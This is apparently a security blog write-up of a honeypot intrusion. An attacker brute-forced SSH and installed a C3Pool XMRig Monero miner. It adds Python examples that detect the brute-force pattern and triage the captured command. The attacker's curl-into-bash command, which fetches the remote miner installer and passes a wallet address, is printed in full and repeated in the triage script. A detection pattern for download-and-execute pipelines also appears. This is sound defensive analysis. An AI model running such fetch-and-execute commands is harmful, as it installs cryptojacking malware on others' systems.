January 23 - US honeypot: brute-force attack to load a Monero miner
On January 4th at 00:47Z, an attacker using IP address 89.44.9[.]225 brute-forced an account on an Eastern US honeypot over SSH. After a few unsuccessful attempts they guessed valid credentials, logged in and ran the following command line:
curl -s -L http[:]//download[.]c3pool[.]org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 89p8myXNvbHLadTsifZ9aMWSM643faM1gWDXkjZMecHMcrp74t9NHKfBzrBGjDqYyH9CTiuegwnfyeoGpz7itBkx8Mst3X4 &
The shell script setup_c3pool_miner.sh that the attacker downloads and pipes straight into bash has SHA-256 0bade474b812222dbb9114125465f9dd558e6368f155a6cd20ca352ddd20549e. It is the C3Pool installer for the XMRig Linux miner (the path name xmrig_setup gives it away), is well known to the security community and is flagged as malicious in public malware databases.
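The sequence described above (a burst of failed SSH logins from one IP followed by an accepted login from the same IP) is exactly what a detection rule over sshd logs should look for. The following is an added example and not part of the original write-up: it parses a constructed auth.log excerpt (the source IP is the one reported; the usernames, ports and exact timestamps are assumptions made up to reproduce the sequence) and flags every successful login preceded by a run of failures from the same address inside a time window.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd log excerpt (assumption: not the honeypot's real log). The
# source IP is the one reported in the write-up; usernames, ports and the exact
# timestamps are made up to reproduce the described sequence.
SAMPLE_AUTH_LOG = """\
Jan  4 00:44:51 honeypot sshd[2141]: Failed password for invalid user admin from 89.44.9.225 port 51022 ssh2
Jan  4 00:45:03 honeypot sshd[2143]: Failed password for root from 89.44.9.225 port 51030 ssh2
Jan  4 00:45:19 honeypot sshd[2145]: Failed password for root from 89.44.9.225 port 51041 ssh2
Jan  4 00:46:02 honeypot sshd[2147]: Failed password for invalid user ubuntu from 89.44.9.225 port 51055 ssh2
Jan  4 00:46:40 honeypot sshd[2149]: Failed password for root from 89.44.9.225 port 51070 ssh2
Jan  4 00:47:12 honeypot sshd[2151]: Accepted password for root from 89.44.9.225 port 51088 ssh2
Jan  4 00:50:00 honeypot sshd[2160]: Accepted publickey for ops from 10.0.0.5 port 40010 ssh2
"""

# Matches the two sshd message shapes we care about (syslog timestamp without year).
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2$"
)


def parse_sshd_line(line):
    """Return (timestamp, result, method, user, ip) or None for lines we do not model."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # Syslog timestamps carry no year; strptime defaults to 1900, which is fine
    # for measuring intervals inside one log file.
    ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
    return ts, m["result"], m["method"], m["user"], m["ip"]


def find_bruteforce_logins(lines, min_failures=3, window_s=600):
    """Flag every successful login preceded by >= min_failures failures from the
    same IP inside window_s seconds (the pattern seen on the honeypot)."""
    failures = defaultdict(deque)  # ip -> timestamps of recent failures
    hits = []
    for line in lines:
        parsed = parse_sshd_line(line)
        if parsed is None:
            continue
        ts, result, method, user, ip = parsed
        q = failures[ip]
        # Drop failures that fell out of the window.
        while q and (ts - q[0]).total_seconds() > window_s:
            q.popleft()
        if result == "Failed":
            q.append(ts)
        elif len(q) >= min_failures:
            hits.append({
                "ip": ip, "user": user, "method": method,
                "failures_before_success": len(q),
                "first_failure": q[0].strftime("%H:%M:%S"),
                "success": ts.strftime("%H:%M:%S"),
            })
            q.clear()
    return hits


if __name__ == "__main__":
    for hit in find_bruteforce_logins(SAMPLE_AUTH_LOG.splitlines()):
        print(hit)
```

On the constructed excerpt the rule reports a single hit: five failures from 89.44.9.225 between 00:44:51 and 00:46:40, then a password login as root at 00:47:12. The legitimate key-based login from 10.0.0.5 is not reported because no failures precede it. Tune min_failures and window_s to your environment; on a honeypot even a single failure before success is worth an alert.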
C3Pool itself is a Monero mining pool. Its website, available in Chinese and English, requires users to confirm that they use the platform "in compliance with laws, regulations and relevant policies in my country or region."
Automatic Translation: I hereby confirm and affirm that I am not a resident of Cuba, Iran, North Korea, Syria or any other country or region subject to sanctions administered or enforced by the relevant country or government or international agency, and that the mining pool services provided by StarMap are in compliance with laws, regulations and relevant policies in my country or region.
The attacker's goal is to use the resources of the compromised device to mine cryptocurrency for their own benefit: the 95-character string passed as an argument to the script has the length and character set of a Monero wallet address (Monero addresses are 95 characters long), so it is almost certainly the wallet that collects the mined coins.
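When triaging a command line like the one above, two things are worth extracting automatically: the download-and-execute pipeline (curl or wget piped into a shell) and any wallet address passed to it. The following is an added example and not part of the original write-up; it runs on the command line quoted above (URL kept defanged as printed there) and applies the Monero address shape described in the previous paragraph, generalised to cover standard addresses, subaddresses and integrated addresses.

```python
import re

# The command line observed on the honeypot, as quoted in the write-up (the URL
# is kept defanged exactly as the write-up prints it).
OBSERVED_COMMAND = (
    "curl -s -L http[:]//download[.]c3pool[.]org/xmrig_setup/raw/master/setup_c3pool_miner.sh "
    "| LC_ALL=en_US.UTF-8 bash -s "
    "89p8myXNvbHLadTsifZ9aMWSM643faM1gWDXkjZMecHMcrp74t9NHKfBzrBGjDqYyH9CTiuegwnfyeoGpz7itBkx8Mst3X4 &"
)

# Monero mainnet address shape: base58 alphabet (no 0, O, I, l); standard
# addresses are 95 chars starting with '4', subaddresses 95 chars starting with
# '8', integrated addresses 106 chars starting with '4'.
B58 = r"[1-9A-HJ-NP-Za-km-z]"
MONERO_ADDR_RE = re.compile(rf"(?<!{B58})(?:[48]{B58}{{94}}|4{B58}{{105}})(?!{B58})")

# "curl/wget ... | [VAR=value ...] sh/bash/dash/zsh": download-and-execute in one pipeline.
DOWNLOAD_EXEC_RE = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:\w+=\S+\s+)*(?:ba|da|z)?sh\b")

URL_RE = re.compile(r"https?://\S+")


def refang(text):
    """Undo the usual defanging so URLs can be matched and looked up."""
    return text.replace("hxxp", "http").replace("[:]", ":").replace("[.]", ".")


def is_monero_address(s):
    """True if s is exactly one Monero mainnet address (shape check only, no checksum)."""
    return MONERO_ADDR_RE.fullmatch(s) is not None


def triage_command(cmd):
    """Pull the indicators a responder wants from a captured shell command."""
    clean = refang(cmd)
    return {
        "download_and_execute": DOWNLOAD_EXEC_RE.search(clean) is not None,
        "urls": URL_RE.findall(clean),
        "wallets": MONERO_ADDR_RE.findall(clean),
    }


if __name__ == "__main__":
    print(triage_command(OBSERVED_COMMAND))
```

On the observed command the triage returns the refanged download URL, flags the curl-to-bash pipeline (the LC_ALL=... prefix before bash is handled), and extracts the 95-character string starting with 8, which is the subaddress form of a Monero wallet. The shape check is deliberately loose (it does not verify the base58-encoded checksum), which is the right trade-off for a detection rule: a false positive costs an analyst a minute, a miss costs CPU for months.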
This kind of attack is not stealthy: the miner consumes CPU and memory, so the compromised host often stops working properly. Yet as cloud use keeps growing, the risk increases, because companies do not always take the time to check the security of their cloud workloads or to monitor what is actually running on them.
It is also interesting to see criminals exploring which activity earns them the most. They look for their "market" by trying whatever pays best. Ransomware nevertheless remains the main source of security incidents, well ahead of mining.
IP address 89.44.9[.]225 (FR - AS 9009 - M247 Europe SRL) is tagged as malicious in public threat-intelligence databases, including for SSH brute-forcing.